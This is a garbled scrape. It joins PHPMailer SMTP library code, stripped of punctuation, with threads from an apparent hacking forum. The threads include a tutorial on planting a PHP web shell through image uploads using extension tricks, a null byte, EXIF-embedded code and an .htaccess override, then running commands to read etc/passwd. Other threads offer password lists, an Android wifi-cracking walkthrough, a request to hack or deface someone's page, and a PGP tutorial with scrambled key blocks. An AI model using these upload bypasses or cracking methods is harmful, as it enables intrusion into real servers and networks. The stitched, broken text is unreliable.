this crlf return false the server ready accept data according rfc should not send more than including the crlf characters single line will break the data into lines and then needed will break each those into smaller lines fit within the limit. 
addition will looking for lines that start with period. 
and append and additional period. 
note this does not count towards are limit. 
normalize the line breaks know the explode works msg data str replace msg data msg data str replace msg data lines explode msg data need find good way determine headers are the msg data straight msg body currently assuming rfc definitions msg headers and the first field the first line sperated does not contain space then should header and can process all lines before blank line headers. 
field substr lines strpos lines headers false empty field strstr field headers true max line length used below set here for ease change while list line each lines lines out null line headers headers false need break this line into several smaller lines while strlen line max line length pos strrpos substr line max line length patch fix dos attack pos pos max line length lines out substr line pos line substr line pos are processing headers need add lwsp char the front the new line rfc long msg headers headers line. 
line lines out line now send the lines the server while list line out each lines out strlen line out substr line out. 
line out fputs this smtp conn line out. 
this crlf all the message data has been sent lets get this over with aleady fputs this smtp conn this crlf. 
rply code this error array error data not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true expand takes the name and asks the server list all the people who are members the list. 
expand will return back and array the result false error occurs. 
each value the array returned has the format the definition defined rfc implements rfc expn smtp code success smtp code failure smtp code error access public return string array function expand name this error null confusion caused this connected this error array error called expand without being connected return false fputs this smtp conn expn. 
rply code this error array error expn not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false parse the reply and place our array return user entries explode this crlf rply while list each entries list substr return list sends the helo command the smtp server. 
this makes sure that and the server are the same known state. 
implements from rfc helo smtp code success smtp code error access public return bool function hello host this error null confusion caused this connected this error array error called hello without being connected return false hostname for the helo was not specified determine suitable one send empty host need determine some sort appopiate default send the server host localhost send extended hello first rfc this sendhello ehlo host this sendhello helo host return false return true sends helo ehlo command. 
access private return bool function sendhello hello host fputs this smtp conn hello. 
rply code this error array error hello. 
not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false this helo rply rply return true gets help information the keyword specified. 
the keyword not specified then returns generic help ussually contianing list keywords that help available. 
this function returns the results back the user. 
the user handle the returned data. 
error occurs then false returned with this error set appropiately. 
implements rfc help smtp code success smtp code error access public return string function help keyword this error null avoid confusion this connected this error array error called help without being connected return false extra empty keyword extra. 
keyword fputs this smtp conn help. 
rply code code this error array error help not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return rply starts mail transaction from the email address specified from. 
returns true successful false otherwise. 
true the mail transaction started and then one more recipient commands may called followed data command. 
implements rfc mail from smtp code success smtp code success smtp code success access public return bool function mail from this error null confusion caused this connected this error array error called mail without being connected return false useverp this verp xverp fputs this smtp conn mail from. 
rply code this error array error mail not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true sends the command noop the smtp server. 
implements from rfc noop smtp code success smtp code error access public return bool function noop this error null confusion caused this connected this error array error called noop without being connected return false fputs this smtp conn noop. 
rply code this error array error noop not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true sends the quit command the server and then closes the socket there error the close error argument true. 
implements from rfc quit smtp code success smtp code error access public return bool function quit close error true this error null there confusion this connected this error array error called quit without being connected return false send the quit command the server fputs this smtp conn quit. 
this crlf get any good bye messages byemsg this get lines this debug echo smtp from server. 
byemsg rval true null code substr byemsg code use tmp var cause close will overwrite this error array error smtp server rejected quit command smtp code code smtp rply substr byemsg rval false this debug echo smtp error. 
this crlf empty close error this close return rval sends the command rcpt the smtp server with the argument. 
returns true the recipient was accepted false was rejected. 
implements from rfc rcpt smtp code success smtp code failure smtp code error access public return bool function recipient this error null confusion caused this connected this error array error called recipient without being connected return false fputs this smtp conn rcpt. 
rply code code this error array error rcpt not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true sends the rset command abort and transaction that currently progress. 
implements rfc rset smtp code success smtp code error access public return bool function reset this error null confusion caused this connected this error array error called reset without being connected return false fputs this smtp conn rset. 
rply code this error array error rset failed smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true starts mail transaction from the email address specified from. 
this command will send the message the users terminal they are logged. 
implements rfc send from smtp code success smtp code success smtp code success access public return bool function send from this error null confusion caused this connected this error array error called send without being connected return false fputs this smtp conn send from. 
rply code this error array error send not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this command will send the message the users terminal they are logged and send them email. 
implements rfc saml from smtp code success smtp code success smtp code success access public return bool function sendandmail from this error null confusion caused this connected this error array error called sendandmail without being connected return false fputs this smtp conn saml from. 
rply code this error array error saml not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this command will send the message the users terminal they are logged mail them they are not. 
implements rfc soml from smtp code success smtp code success smtp code success access public return bool function sendormail from this error null confusion caused this connected this error array error called sendormail without being connected return false fputs this smtp conn soml from. 
rply code this error array error soml not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true this optional command for smtp that this class does not support. 
this method here make the rfc definition complete for this class and may implimented the future implements from rfc turn smtp code success smtp code failure smtp code error access public return bool function turn this error array error this method turn the smtp. 
not implemented this debug echo smtp notice. 
this crlf return false verifies that the name recognized the server. 
returns false the name could not verified otherwise the response from the server returned. 
implements rfc vrfy smtp code success smtp code failure smtp code error access public return int function verify name this error null confusion caused this connected this error array error called verify without being connected return false fputs this smtp conn vrfy. 
rply code code this error array error vrfy failed name name' smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return rply internal functions read many lines possible either before eof socket timeout occurs the operation. 
with smtp can tell have more lines read the character symbol. 
space then don't need read anything else. 
access private return string function get lines data while str fgets this smtp conn this debug echo smtp get lines data was data. 
this crlf echo smtp get lines str str. 
str this debug echo smtp get lines data data. 
this crlf the character space then are done reading just break the loop substr str break return data allemails split emaillist numemails count allemails random smtp string array. 
class phpmailer properties public email priority high normal low. 
var int var priority sets the charset the message. 
var string var charset 'iso sets the content type the message. 
var string var contenttype 'text plain' sets the encoding the message. 
options for this are bit bit binary base and quoted printable. 
var string var encoding bit' holds the most recent mailer error message. 
var string var errorinfo sets the from email address for the message. 
var string var from sets the from name the message. 
var string var fromname sets the sender email return path the message. 
not empty will sent via sendmail 'mail from' smtp mode. 
var string var sender sets the subject the message. 
var string var subject sets the body the message. 
this can either html text body. 
html then run ishtml true. 
var string var body sets the text only body the message. 
this automatically sets the email multipart alternative. 
this body can read mail clients that not have html email capability such mutt. 
clients that can read html will view the normal body. 
var string var altbody sets word wrapping the body the message given number characters. 
var int var wordwrap method send mail mail sendmail smtp. 
var string var mailer 'mail' sets the path the sendmail program. 
var string var sendmail usr sbin sendmail' path phpmailer plugins. 
this now only useful the smtp class different directory than the php include path. 
var string var plugindir holds phpmailer version. 
var string var version sets the email address that reading confirmation will sent. 
var string var sets the hostname use message and received headers and default helo string. 
empty the value returned server name used 'localhost. 
var string var hostname sets the message used the message header. 
empty unique will generated. 
var string var messageid properties for smtp sets the smtp hosts. 
all hosts must separated semicolon. 
you can also specify different port for each host using this format hostname port. 
hosts will tried order. 
var string var host 'localhost' sets the default smtp server port. 
var int var port sets the smtp helo the message default hostname. 
var string var helo sets connection prefix. 
options are ssl tls var string var smtpsecure sets smtp authentication. 
utilizes the username and password variables. 
var bool var smtpauth false sets smtp username. 
var string var username sets smtp password. 
var string var password sets the smtp server timeout seconds. 
this function will not work with the win version. 
var int var timeout sets smtp class debugging off. 
var bool var smtpdebug false prevents the smtp connection from being closed after each mail sending. 
this set true then close the connection requires explicit call smtpclose. 
var bool var smtpkeepalive false provides the ability have the field process individual emails instead sending entire addresses var bool var singleto false properties private var smtp null var array var array var bcc array var replyto array var attachment array var customheader array var message type var boundary array var language array var error count var var sign key file var sign key pass methods variables sets message type html. 
param bool bool return void function ishtml bool bool true this contenttype 'text html' else this contenttype 'text plain' sets mailer send message using smtp. 
return void function issmtp this mailer 'smtp' sets mailer send message using php mail function. 
return void function ismail this mailer 'mail' sets mailer send message using the sendmail program. 
return void function issendmail this mailer 'sendmail' sets mailer send message using the qmail mta. 
return void function isqmail this sendmail var qmail bin sendmail' this mailer 'sendmail' methods recipients adds address. 
param string address param string name return void function addaddress address name cur count this this cur trim address this cur name adds address. 
note this function works with the smtp mailer win not with the mail mailer. 
param string address param string name return void function addcc address name cur count this this cur trim address this cur name adds bcc address. 
param string address param string name return void function addbcc address name cur count this bcc this bcc cur trim address this bcc cur name adds reply address. 
param string address param string name return void function addreplyto address name cur count this replyto this replyto cur trim address this replyto cur name methods mail sending creates message and assigns mailer. 
the message not sent successfully then returns false. 
use the errorinfo variable view description the error. 
return bool function send header body result true count this count this count this bcc this seterror this lang 'provide address' return false set whether the message multipart alternative empty this altbody this contenttype 'multipart alternative' this error count reset errors this setmessagetype header. 
this createheader body this createbody body return false choose the mailer switch this mailer case 'sendmail' result this sendmailsend header body break case 'smtp' result this smtpsend header body break case 'mail' result this mailsend header body break default result this mailsend header body break this seterror this mailer. 
this lang 'mailer not supported' result false break return result sends mail using the sendmail program. 
access private return bool function sendmailsend header body this sender sendmail sprintf escapeshellcmd this sendmail escapeshellarg this sender else sendmail sprintf escapeshellcmd this sendmail mail popen sendmail 'w' this seterror this lang 'execute'. 
this sendmail return false fputs mail header fputs mail body result pclose mail version compare phpversion. 
result result xff result this seterror this lang 'execute'. 
this sendmail return false return true sends mail using the php mail function. 
access private return bool function mailsend header body for count this. 
this addrformat this toarr split params sprintf this sender this sender strlen ini get 'safe mode' old from ini get 'sendmail from' ini set 'sendmail from' this sender this singleto true count toarr foreach toarr key val mail val this encodeheader this secureheader this subject body header params else mail this encodeheader this secureheader this subject body header params else this singleto true count toarr foreach toarr key val mail val this encodeheader this secureheader this subject body header params else mail this encodeheader this secureheader this subject body header isset old from ini set 'sendmail from' old from this seterror this lang 'instantiate' return false return true sends mail via smtp using phpsmtp author chris ryan. 
returns false there bad mail from rcpt data input. 
access private return bool function smtpsend header body error bad rcpt array this smtpconnect echo failed mailer unable connect smtp die return false smtp from this sender this from this sender this smtp mail smtp from error this lang 'from failed'. 
smtp from this seterror error this smtp reset return false attempt send attach all recipients for count this this smtp recipient this bad rcpt this for count this this smtp recipient this bad rcpt this for count this bcc this smtp recipient this bcc bad rcpt this bcc count bad rcpt create error message for count bad rcpt error. 
bad rcpt error this lang 'recipients failed'. 
error this seterror error this smtp reset return false this smtp data header. 
body this seterror this lang 'data not accepted' this smtp reset return false this smtpkeepalive true this smtp reset else this smtpclose return true initiates connection smtp server. 
returns false the operation failed. 
access private return bool function smtpconnect this smtp null this smtp new smtp this smtp debug this smtpdebug hosts explode this host index connection this smtp connected retry while there connection while index count hosts connection false hostinfo array eregi. 
hosts index hostinfo host hostinfo port hostinfo else host hosts index port this port this smtp connect empty this smtpsecure this smtpsecure. 
host port this timeout this helo this smtp hello this helo else this smtp hello this serverhostname connection true this smtpauth this smtp authenticate this username this password this seterror this lang 'authenticate' this smtp reset connection false index connection this seterror this lang 'connect host' return connection closes the active smtp one exists. 
return void function smtpclose this smtp null this smtp connected this smtp quit this smtp close sets the language for all class error messages. 
returns false cannot load the language file. 
the default language type english. 
param string lang type type language. 
portuguese param string lang path path the language file directory access public return bool function setlanguage lang type lang path 'language file exists lang path. 
php' include lang path. 
php' elseif file exists lang path. 
php' else this seterror 'could not load language file' return false this language phpmailer lang return true methods message creation creates recipient headers. 
access private return string function addrappend type addr addr str type. 
this addrformat addr count addr for count addr addr str. 
this addrformat addr addr str. 
this return addr str formats address correctly. 
access private return string function addrformat addr empty addr formatted this secureheader addr else formatted this encodeheader this secureheader addr 'phrase'. 
return formatted wraps message for use with mailers that not automatically perform wrapping and for quoted printable. 
access private return string function wraptext message length mode false soft break mode sprintf this this utf encoding used will need make sure don't split multibyte characters when wrap utf strtolower this charset utf message this fixeol message substr message this message substr message line explode this message message for count line line part explode line buf for length space left length strlen buf space left len space left utf len this utf charboundary word len elseif substr word len len elseif substr word len len part substr word len word substr word len buf. 
sprintf this else message. 
soft break buf while strlen word len length utf len this utf charboundary word len elseif substr word len len elseif substr word len len part substr word len word substr word len strlen word message. 
sprintf this else buf part else buf buf buf. 
word strlen buf length and buf message. 
soft break buf word message. 
this return message finds last character boundary prior maxlength utf quoted printable encoded string. 
original written colin brown. 
access private param string encodedtext utf text param int maxlength find last character boundary prior this length return int function utf charboundary encodedtext maxlength foundsplitpos false lookback while foundsplitpos lastchunk substr encodedtext maxlength lookback lookback encodedcharpos strpos lastchunk encodedcharpos false found start encoded character byte within lookback block. 
check the encoded byte value the chars after the hex substr encodedtext maxlength lookback encodedcharpos dec hexdec hex dec single byte character. 
the encoded char was found pos will fit otherwise reduce maxlength start the encoded char maxlength encodedcharpos maxlength maxlength lookback encodedcharpos foundsplitpos true elseif dec. 
alot there's nothing there. 
for example i'll using this one now this moral the story and how use the very end the video link youtube just add code and you'll able watch. 
really want know this vpn can pass equally though the upd ports. 
nice one thanks for the list. 
lets see still works. 
thanks man really happy for this tool. 
codefire ripper not business with him. 
can't see that hidden content sent from aqua style pro using tapatalk. 
how shell server via image upload and bypass extension real image verification during website audit upload forms and other interactive 'user content' driven facilities are often found protected client side and server side security checks. 
this tutorial presents the methods that can used circumvent these security checks. 
this case we're specifically considering image uploads that allow jpg files particular. 
each security measure numbered below will briefly discussed and paired with appropriate bypass method this tutorial aims provide complete'ish solution. 
client side file verification with javascript and html attributes the bypass trivial simply rename your shell with allowed extension content type editing the request header data with intercepting proxy like hidden content you must reply see links but hidden content you must reply see links add great too. 
white list file extensions place that anything that isn't picture denied often there will then some sort string manipulation determine the file name and extension uploaded file. 
the strength this code will determine whether one the following bypasses will work. 
functions like 'strrchr' shown below may play part this process and may passable given little bit imagination here list bypasses shell. 
php satisfies check for jpg only shell. 
jpg sometimes can ignore whats after shell. 
jpg the infamous null byte which comments out trailing text remove the word delete the zeros join together blogspot strips this string shell. 
test defaults first recognised extension ignoring test shell. 
jpg but not recognised extension will default php. 
phtml commonly used php parsed extension often forgotten about. 
php valid php extensions possibly left out extension blacklists. 
perform further checks once uploaded make sure real image the function getimagesize effectively confirms whether the uploaded file image not. 
this point all the other methods will fail there are other functions that can used with similar goal such checking image dimensions. 
the only full proof solution actually upload real image which will actually pass these checks rather than trying bypass them. 
turn the trusty jpg file our example image. 
there amazing amount information that can stored jpg file along side the actualy image data. 
exif 'meta' data such the camera model the image was taken image descriptions and comments are editable with progams such gimp and even hex editor. 
for purposes this tutorial use hidden content you must reply see links. 
edit good pal hooded robin wrote nifty exif editor and shell builder ruby check out hidden content you must reply see links. 
create small image avatar size mspaint white background can use exif pilot open edit the file and edit the exif data inserting our php code into the 'comment' section. 
using generic 'tiny shell' code allow pass shell commands the server the fly. 
now can upload the jpg file using extension bypass shown earlier and will pass the real image check. 
run commands the server usage would hidden content you must reply see links etc passwd. 
found extension that will upload but its not valid php. 
htaccess file which sets arbitrary file extension processed php. 
htacess file the image upload directory this should automatically overwritten. 
htaccess file and put the following code then upload replace. 
with whatever extension passed. 
upload your shell shell. 
then access hidden content you must reply see links etc passwd you are useful why not click the rep get new tutorial from. 
keep the good work. 
can someone please help hack account i've been trying get back for majority this year. 
codefire wrote password list containing passwords and most common used password list thanks for downloads img post longer allowed here the download. 
for password cracking you can choose two different methods. 
here the list passwords free download hidden content you must reply see links you didn't get success using the above password list then you can get the uniqpass dictionary file from. 
see preview uniqpass from these hidden content you must reply see links. 
get the uniqpass dictionary file from here hidden content you must reply see links. 
thanks man great work. 
how crack wifi password android crack wifi password android android most popular for any users. 
requirements for crack wifi password android hidden content you must reply see links rooted android mobile nearby wifi with wps abailable features this wifi cracker apk left cracking any wep wpa and wpa wifi wps available left faster method took only seconds left much more. 
steps for crack wifi password android how crack wifi password mobile first download wifi cracker app name hidden content you must reply see links after download open app give root permissions click grant after that click refresh icon from top right will show you list all available wifi available your area wifi has wps available vulnable then will cracked click wifi name click try connect then will take seconds maximum boom will show you wifi password now wifi has wps available and vulnable hidden content you must reply see links wifi not vulnable then will give you error you got this error then your bad luck. 
cheers mike tnx bro. 
thanks for sharing but not working the link. 
taking look thanks for the share. 
interested pls tell how its done. 
nice share really like. 
thanks this nice tutorial and rat. 
cheers mike thanls and will read all the topic. 
got this friend who just broke with asshole. 
likes following and harassing her posts and was wondering anyone could shut down take over deface his page. 
btw anyone takes this you have gained much respect from. 
there will poll the bottom know who this. 
please dont think not helping either. 
can get any information you need thanks spiderworky. 
this tutorial explain bitcoin and demonstrate how get started using. 
this video includes instruction how perform transactions how get free coins trade coins over exchange and mine coins well where from there. 
all sensitive data such dwolla info used this video bogus for security purposes. 
com watch ejiqbzqmxse video. 
today publish very complete tutorial about how use pgp mail encryption for mails between your friends colleagues etc. 
and will using mozilla mail client thunderbird. 
thunderbird very efficient mail client which also open source has large community behind keep this nice piece software safe secure and often updated. 
also because the firefox web browser part the same family offers wide collection add ons called plugins make your mailing experience continiously better. 
you still don use thunderbird recommend you get now from its official website clicking the button link below. 
hidden content you must reply see links note that thunderbird recommended hidden content you must reply see links website website dedicated the hidden content you must reply see linkscompany the company which behind the famous onion proxy service tor. 
why necessary encrypt mails nowadays this question has many possible answers. 
one the most important would your privacy. 
suppose you work company you are continuously sending and receiving mails that contain sensitive information. 
but you not really understand how the mail protocol works. 
most cases your mails will handled your company mail server and that serviced your system network administrators. 
did you know that they are able read all your mails you realize that someone else reading your mails they could create serious problems details your company the policies strategies your company even your personal life would become public sold competitor. 
this happened others and could happen you the people who manage the mail servers are evil but also they are stupid. 
everybody should use imap with tls grab new mails securely much like when you should visite website using. 
for instance you connect public wifi spot private wifi spot with weak security anybody could grab via packet sniffing your mail contents and read them without you noticing. 
another reason encrypt your mails would someone steals your laptop could easily break into your mail client and read all your mails. 
could even send incriminating mails your clients colleagues. 
pgp will also giving proof your identity your pen friend. 
finally you already know after the last month stories about prism government secret services can get their hands your mails without any problem. 
these governments will try convince you that all they within the law and only done catch spies terrorists but that not really the problem. 
the problem that someone reading your mails and that invading your sense privacy. 
that why you should protecting and securing your mail because you don want complete stranger read your personal communication. 
when correctly configured pgp the perfect solution protect yourself against such issues. 
will encrypt transform readable data unreadable version your mails using strong encryption method and addition will proof your identity using signed message function. 
prerequisite thunderbird mail client installed refer the top this tutorial for the download link least one mail address configured with thunderbird that all begin with. 
our example have created some temporary mail addresses phrozentest gmail. 
com which represents you and phrozentest gmail. 
com which represents your partner. 
use pgp mail encryption both you and your partner must configure the mail client use pgp encryption hidden content you must reply see links install enigmail the first thing you need install the add which will integrate into thunderbird the ability use pgp encryption your mails. 
this add far the most complete available and also the most respected has lot features and detects automatically when mail encrypted. 
asks you enter your pass phrase decrypt the mail content. 
option menu depending your thunderbird version. 
could the upper left corner right for latest versions. 
then click add ons menu. 
hidden content you must reply see links then the add ons window search for enigmail hidden content you must reply see links you should find plenty add ons corresponding this search which are all related pgp encryption only enigmail our favorite one will will interest. 
hidden content you must reply see links click install button then restart thunderbird apply add configuration. 
hidden content you must reply see linksnormally new menu should appear the option menu for enigmail configuration. 
will explain the utility this menu soon this tutorial. 
install gpg win gnupg free libraries for using pgp now must install the pgp libraries for windows note that you don use windows you will need find and download the equivalent package for your operating system. 
for windows hidden content you must reply see linksoffers great bundle which comes with kleopatra and course the gnupg libraries use pgp encryption. 
free but course you could donate support this software. 
hidden content you must reply see links when downloaded run the setup. 
simply follow the steps see below. 
hidden content you must reply see links hidden content you must reply see links hidden content you must reply see linkswhen correctly installed should offer you run the kleopatra software. 
this software will generate new certificate and manage certificate graphically very user friendly manner. 
create new certificate run kleopatra you haven done already. 
then click file new certificate. 
hidden content you must reply see links choose create personal openpgp key pair hidden content you must reply see links with the next step you must enter some information about yourself. 
enter your name your email address and optionally comment which describes this certificate you can have multiple certificates for different persons use comment differentiate them. 
hidden content you must reply see linksimportant not click next yet firstly you must change the key strength for security reasons click advanced settings button see above then switch the rsa key strength from bits default bits maximum and higher security see bellow hidden content you must reply see links click then click next finalize the certificate creation wizard. 
hidden content you must reply see links you just create your very first certificate now you can choose backup your key pair key pair are composed the public and private key export them later from kleopatra interface. 
recommended backup your keys safe location. 
your private key should never released public because that could compromise your security and privacy. 
store usb key and keep this usb securely hidden. 
reminder the public key the key you must share with the people you need contact securely via mail. 
this key will used each your correspondents send you encrypted mails. 
able respond those mails secure way you also need the public key your correspondent send them encrypted mails using their public key. 
called that public key exchange. 
the private key the key you need decrypt arrival messages you must not share lose this key. 
the public key content looks like that begin pgp public key block version gnupg. 
mingw mqinbfjmbu beac qampd rgtayvbwjmfne bimszvdhnb qeuwtt knc zcghcqrhdmxql pxoh pzaqajpbvga ezis gxhr acvwk bduteixrcjfl icpoh gjlm cpbgzlnut fmntvtz brx wjbrzka fhnrozfb dnmmphu rvl xubmiekcg wrik jwol wguuysbd klivx revkdxf euv hyj ilkfyhyuvbynqx ufyex lsvb blqubjlbff kjpdpfj antulmesgel qpj jzbuwc rnzhio sqot rctcmyt bnaju nvbikkdqfjxmrs acxrovj kjdabdanfayb slfa dhmmno hte cwa vufstyog wdl klk frpk gpz vorrbjl dsobcq ckwaraqab tdtkb dgluz ddfaz hawwuy agmbah iif qqak jkq ynkyweja cedv dtebsejarvx pmufzqslhuqwck nsb jgs sosontyls vvpr zscozsnk vkveghrgtx bzi fcybge iutcfwudz lkzpfvucbqepr hppovi oucdlyuriftbd cgq zbqtkfc ypyrywuay jngspup bimusb myofzr wocipbksuehnh lot qmjnefmej mmst jzsuiatkyj ednir yaje xvuau vma eyc wyrcaldccw tob laiw wgjg dgkp aqjsptpoy ddsv umwysoqpojc tbo wrqgfozonc qalvyrnoq zmi iuiv ytmtqya enc dklhyihcsvqxm oxiq ggm onenr iavja fdxrpegptrnqql htwkxe wrpqg rsxuoupif wnxjmowjftnl jhi ddyzojg qgz mthkwb end pgp public key block always begin with the begin pgp public key block and ends with end pgp public key block the private key content looks like that begin pgp private key block version gnupg. 
mingw lqc bfjmbu beac qampd rgtayvbwjmfne bimszvdhnb qeuwtt knc zcghcqrhdmxql pxoh pzaqajpbvga ezis gxhr acvwk bduteixrcjfl icpoh gjlm cpbgzlnut bpmjuwuuql fmntvtz brx wjbrzka fhnrozfb dnmmphu rvl xubmiekcg wrik jwol wguuysbd klivx revkdxf euv hyj ilkfyhyuvbynqx ufyex lsvb blqubjlbff kjpdpfj antulmesgel qpj jzbuwc rnzhio sqot rctcmyt bnaju nvbikkdqfjxmrs acxrovj kjdabdanfayb slfa dhmmno hte cwa vufstyog wdl ociuzyetxdwqa vorrbjl dsobcq ckwaraqab gmdakmco pni ysfegfpgfs usbgdcymu oyezcfjcli gpc qzpekzcsrmlsz gnbtgv hhot jxcpqss hokobdfe kusg yvvca cwnbqd rgsyssyz csnubks konag gbhvjw ynp qdab zpw xco qdynu mootpwu illmdfhm cmjsubi ikjp azgstp bpl svph vowitf sxdehsx uvs xlj vpq mmlsmkkwmxl oknd yck efljwsfzyzosqy shq hlefbzt fmbuugf ipjya eqkuyed dtaf lfycu xbsee teqg rcg ipch lojm ovgi fynyq opwhtl ztoydlwtkkmu wne fsjpha xpzwu bdbyjmxphuq iwi haxrpy tnvx wzfmnemjiq ekg ifvtc hqhkyuqvrqy igazhtlk wusr nqipofu ele jph paknt hiezs jotsbyb npzia dwx mbvashqmpa xee zvb yft ihn ewkiat emwoe bsfv ajkptmv czk nahkjly ggv vulxh oqdpkykbe bgvth wolru kbnfqeyskcvdy txh yeaihv docl qfo robtnfbo mklshpzuxjqd tqjlxlz czob fbepnjw ltsinyc dnzkqwqxf eedzqm ybu ugaump wztdgxw chnakqdwmh ukhlsbjkfw hrwtvhq sus vqgqg xmzs sinp mddo byd lfq lyzs hsewx mzvp lmrxfet wvrh eirlkbt acx pxrphg rvp xljpgrt oydyduck vcdy gcdw bjemvicrra ifqfmoour ejf dfpov pvfvemuefung yjc ldl lfeit dcjspmlq rgf vlkiszw vcp drznzmfcfn vjai hyq fnrjg htpstyg wnwfz whu tdtkb huiervzsaotxkg dgluz hawwuy tpokc iif qqak jkq ynkyweja cedv nftx end pgp private key block always begin with the begin pgp private key block and ends with end pgp private key block now you can see your certificate information the main kleopatra window. 
hidden content you must reply see links you can see details about your certificate double clicking row change the passphrase expiry date etc. 
hidden content you must reply see links you can also export your public and private key from the main window selecting row. 
hidden content you must reply see links export certificates. 
option will export your public key. 
export secret keys option will export your private key. 
configure thunderbird first thunderbird should popup error message saying the enigmail add wasn able find the gnupg binaries your computer click will configure the add. 
hidden content you must reply see links the thunderbird option menu then click openpgp preferences the following window should appears. 
hidden content you must reply see linksclick browse then find the location gnupg content directory which comes with gpg win default location program files gnu gnupg then browse the pub folder and select gpg. 
hidden content you must reply see links now you should able work with pgp encryption using thunderbird mail client. 
import certificates you are now ready add some your contact public keys which accept using pgp discuss through mail. 
you could use the kleopatra software more simply the embedded key manager engimail from the thunderbird mail client. 
the thunderbird option menu then click openpgp key management the following window should appear. 
hidden content you must reply see links should normally automatically detect the imported keys private public keys for your accounts and public keys your contacts you already used kleopatra for key importation otherwise nothing appears first you must import your private and public keys and also all your contact public keys. 
each time you add private public key you should see this kind message box. 
hidden content you must reply see links this means everything went well during importation. 
when you have imported all needed keys you are now ready use pgp mail encryption sending mail using pgp encryption this example will send email from test account phrozentest gmail. 
com fake partner phrozentest gmail. 
course achieve this successfully imported the private and public key phrozentest gmail. 
com account and imported the public key phrozentest gmail. 
com send encrypted mails. 
com also have public key send encrypted message which will decrypted using private key. 
start writing new mail using thunderbird then click openpgp toolbar then check the click sign message the first time you send encrypted mail identity you will need run short configuration. 
see below hidden content you must reply see linksthen click enable openpgp support enigmail for this identity hidden content you must reply see links also recommend check the following check boxes sign non encrypted messages default sign encrypted message default important case you forgot encrypt very confidential mail will automatically encrypt messages default finally the new mail window back openpgp toolbar menu then click encrypt message not already done. 
hidden content you must reply see links note that pgp doesn support the message containing html when using pgp send encrypted mail you should avoid composing message using html the following alert should appear then but might not prevent mail sending. 
hidden content you must reply see links click this message appears then enter your pass phrase the pass phrase the password you choose during certificate creation wizard without this password you can encrypt read encrypted mails which use your private key this the symmetric encryption protection. 
hidden content you must reply see linksif pass phrase correct the mail should start doing submission process the bellow image can see our message encrypted before sending. 
hidden content you must reply see links now will read our fresh encrypted mail our second test inbox phrozentest gmail. 
com just click the mail you want read should offer enter your pass phrase like when sending encrypted mail but this time read the mail. 
hidden content you must reply see links pass phrase was successfully entered you should able read the mail content. 
hidden content you must reply see links conclusion you are now able use pgp encryption secure your mails between you and your colleges friends random people the internet which would like contact you secure way. 
this method commonly used the army and government intelligence services for its robustness and simplicity. 
correctly configured you can sleep sound sleep just some final notes gpg win offers you easy way encrypt decrypt files using your certificate. 
when you delete confidential files from your computer when you decrypt them for example use file shredder avoid file recovery analyzing hard drives. 
enigmail offers you encrypt file attachment when sending encrypted mail always accept attachment encryption. 
never share your private keys only public keys must offered your contacts. 
keep backup your private and public keys secure location. 
aware the laws your country regarding encryption standards. 
pgp protects you against mail hijacking unfortunate reading but your computer infected spyware won help much. 
your computer must healthy efficient. 
that should enough you encountered any issue during the tutorial feel free ask help will respond shortly and help you get everything work send pgp mails phrozensoft gmail. 
com public key begin pgp public key block version gnupg. 
mingw mqinbfjp cybeaddjmltqh vduiwtohe qyol urdpef rgmie obnwlb lmxsfsvc vahwehh xdxbpc nyvnfbsi aysg zbq dflvqrdgud gfusyfw bmm nlhakcsxu jbpdtcqyagomc agr zwalsjxt qihwcwypuf spd hzoo wve nrpx rvnbheqggmnbr kbnizgusgdfjo lakwj lcn qfdurnigzh bkszh ewtm casp lkderjdcpo tixsrlps njqr oka nzufpu gvtjz rnikdz bjcs trltq jto utskwcltcq irwtbn osus jxcmgbpyjofc gejazem mrhyktiiv bwb natnvqvu kvqvgpaotuv tki rytm mih fsrdrge gvyz htg iokrzirjstm lwqst hggap sepbwl nthtrwwaraqab mdebnbwfpbc iqi bbmbagajbqjst pnx ufw fue jguvuozn rldmrf sujtpqugajpw mionq zqzuv rpqu cqguib sawevytfu hppy egjfr zkpsuw ccp gvspxhy fckydb rwpa cqndbjw mnurtuq wia cwxwfgamcwi bfs esnb apm vpo vfv tcvc wcvso eimjrs qdsp zfhbl siyhzwwz gmefuh nza hws ogrgro devg nffzbtq gvpa ovh glrdmcdoai mdvxb rzvk dpxqgett hqjcetkycevj rlm ysun tfirmglyb aookcuhzr uyeoduvlqckla scjfpxyswswj spta djku qum fcor fikl eijfyh oyv ulaqx lqg ewfpfhtbmcx ovsnhu nxpciw vbi rfron fbyuq aue asmjbgebs josc telkenlfzw pvyf end pgp public key block admin phrozensoft. 
mingw mqinbfjp hmbeac jhdcdra moubzrbnf ezfvy dqrc aqt gwxk nmd kju klphi vulkyufvii lagxem kvlmhby ptxikaq ncfpr rijnx tjomwwlruxwu kckb kzlra whlmj gfv zgff rszhype rwxts ulvb lsuk ksivy yqutbbvzusa qrysmbvvkfzk trtgovd wlawlzd xbbj mpqcbapeeq uevo mxw olw estmsyq rgajqnpxfu okop bqnx clxwq cicyhxrcltdo oovxu dfuunry dlzga dkqytm xfy xokgsiblg ucbfrprl gqqx nceuvkodgft lnlvmdh xyjbemnznjc oznkfohsrxqh rknpn itym scy wxt lyclbel ewaraqab pbkbwahjvemvuc mdc iqi bbmbagajbqjst xlrfpl ejal mwdauhqoeyka svawc cfnj omjf eiqtt kuy sxya xylikne hwzsxb jdz jtilr sqnixwixckpe xbggdavvityoq yja vknoblqlzk htbhu mvc zugspa ujoopkys ggqi yke tqp xpvkhin uvig hed rol nnp uonbe kilw dnbqucck kipldnld zvcp olx yvzyns tufbucvs tte edxdq orjx jtzl giv afqbj lovg hfcw pqwkeuw iybs ocfgv xupcrfwomyz dnfq adxrcpp nozheypmkhoq mme vnxebi wgxo wsh gdlab rmvlpgcp zlucl txwjocjjnuxp mgyiamnu bdbxkgn jya veg iadwrdodi cbadrjbnveiyq ntt qhbz ahgc end pgp public key block credit phrozensoft. 
tnx for sharing bro tnx for sharing bro. 
